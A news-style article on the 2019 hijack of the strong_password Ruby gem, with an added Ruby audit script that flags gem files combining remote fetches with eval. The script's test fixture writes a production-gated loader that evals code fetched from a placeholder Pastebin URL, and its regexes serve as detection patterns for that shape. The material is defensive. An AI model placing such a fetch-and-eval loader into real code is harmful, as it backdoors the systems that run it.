Jul 12, 2019

Package hijacking spreads to the Ruby ecosystem as malicious code is inserted into compromised Ruby gem

RubyGems, the package manager for the Ruby programming language, is the latest platform to be targeted by package hijackers. A new version of the strong_password gem added a few lines of code that checked whether the gem was running in a production environment and, if so, fetched and executed arbitrary code stored in a Pastebin post. Because the payload was loaded from a remote URL at run time rather than shipped inside the gem, the attacker could change what the backdoor did at any moment without publishing another version, and a review of the packaged source would show only the small loader. strong_password is a fairly popular gem, with over 250,000 downloads over its lifetime. The malicious code was discovered by a developer who was auditing his own application's dependencies and who notified the RubyGems team; they yanked the affected version and locked the associated account. Later analysis revealed that the account credentials of the gem's original maintainer had been compromised, giving the attacker the ability to publish new versions of the gem under the maintainer's identity.
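As an added example of the kind of dependency audit that caught this incident (not code from the article, from the strong_password gem or from the RubyGems team), the Ruby script below walks gem sources and flags files that combine a remote HTTP read with eval, the loader shape described above. The indicator regexes, the paste-site list and the sample gem tree it scans are all constructed for this example; the sample uses a Rails production check as the environment gate, which is an assumption, since the article only says the code checked for production.

```ruby
# Added example (not code from the article, the strong_password gem or RubyGems):
# a heuristic audit that walks gem sources and flags files combining a remote fetch
# with eval, the "fetch-and-eval" loader shape described in the article.
require 'tmpdir'
require 'fileutils'

# Indicators of a fetch-and-eval loader. The regexes are heuristics written for this
# example, not a rule set from any real scanner.
INDICATORS = {
  eval:  /\b(?:eval|instance_eval|class_eval|module_eval)\b/,
  fetch: /Net::HTTP\.(?:get|get_response|start)\b|URI\.open\b|\bopen\(\s*URI\b|require\s+['"]open-uri['"]/,
  env:   /Rails\.env\.production\?|ENV\[['"](?:RAILS|RACK)_ENV['"]\]\s*==\s*['"]production['"]/,
  paste: %r{https?://(?:www\.)?(?:pastebin\.com/raw|gist\.githubusercontent\.com)/}i
}.freeze

Finding = Struct.new(:path, :indicators, :lines)

# Returns a Finding when a file both fetches remote content and calls eval; the
# environment gate and paste-site host are recorded as supporting indicators.
# Returns nil for files that do not show the fetch+eval combination.
def scan_file(path)
  hits = Hash.new { |h, k| h[k] = [] }
  File.read(path, mode: 'r:UTF-8').scrub.each_line.with_index(1) do |text, lineno|
    INDICATORS.each { |name, re| hits[name] << lineno if text.match?(re) }
  end
  return nil unless hits.key?(:eval) && hits.key?(:fetch)
  Finding.new(path, hits.keys.sort, hits.values.flatten.uniq.sort)
end

# Scans every .rb file under a gem directory.
def scan_gem_dir(root)
  Dir.glob(File.join(root, '**', '*.rb')).sort.map { |f| scan_file(f) }.compact
end

# Runs the scan over every gem installed in the current Ruby environment.
def scan_installed_gems
  Gem::Specification.map(&:full_gem_path).uniq.flat_map { |dir| scan_gem_dir(dir) }
end

# Constructed sample tree mirroring the described behaviour: a production gate, a
# fetch from a paste site and eval of the response. The URL is a placeholder, not
# the address used in the real incident. A benign file that evals a local string
# is included to show that eval alone is not flagged.
def build_sample_tree
  root = Dir.mktmpdir('gem-audit-sample')
  lib = File.join(root, 'lib')
  FileUtils.mkdir_p(lib)
  File.write(File.join(lib, 'loader.rb'), <<~RUBY)
    # constructed sample, not the gem's real code
    if Rails.env.production?
      eval(Net::HTTP.get(URI('https://pastebin.com/raw/PLACEHOLDER')))
    end
  RUBY
  File.write(File.join(lib, 'dsl.rb'), <<~RUBY)
    # benign: instance_eval of a caller-supplied local string, no remote fetch
    class Dsl
      def run(code)
        instance_eval(code)
      end
    end
  RUBY
  root
end

# Builds the sample tree, scans it and returns [basename, indicators] per finding.
def audit_sample
  root = build_sample_tree
  begin
    scan_gem_dir(root).map { |f| [File.basename(f.path), f.indicators] }
  ensure
    FileUtils.remove_entry(root)
  end
end

if $PROGRAM_NAME == __FILE__
  audit_sample.each { |name, indicators| puts "#{name}: #{indicators.join(', ')}" }
end
```

Against the constructed tree only loader.rb is reported, with all four indicators. Running scan_installed_gems over a real environment will produce false positives, since DSLs and template engines use eval legitimately, so treat a hit as a prompt to read the file and diff the gem against its previous version, not as a verdict.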

RubyGems is a package manager that provides a standard format for distributing Ruby libraries (called gems), a tool to install gems, and a service for hosting gems for the community at RubyGems.org. Similar to the npm registry and command line tool, RubyGems allows developers to extend the functionality of their code with a huge ecosystem of open source projects. Unlike RubyGems, however, npm is operated by a for-profit company that offers other services through its package registry.

RubyGems is another victim in a string of similar attacks. Over the past few months, the open source JavaScript community has come under increasing scrutiny after a number of high-profile incidents involving npm packages. Most recently, an attacker published a legitimate-looking npm package, waited until it had been adopted as a dependency by an open source project the attacker had contributed to, and only then pushed a version containing malicious code. The Ruby ecosystem, unfortunately, now has to cope with the same class of attack.

The pervasiveness and persistence of hijacking attacks shows that no developer ecosystem is entirely immune to them. Different package registries, however, are implementing different protective measures on different timelines, so developers will likely have to navigate a patchwork of trustworthiness across programming languages. In the meantime, the strong_password case shows the value of reviewing what actually changes when a dependency is updated, rather than trusting the registry alone: that review, not the registry, is what caught this one.
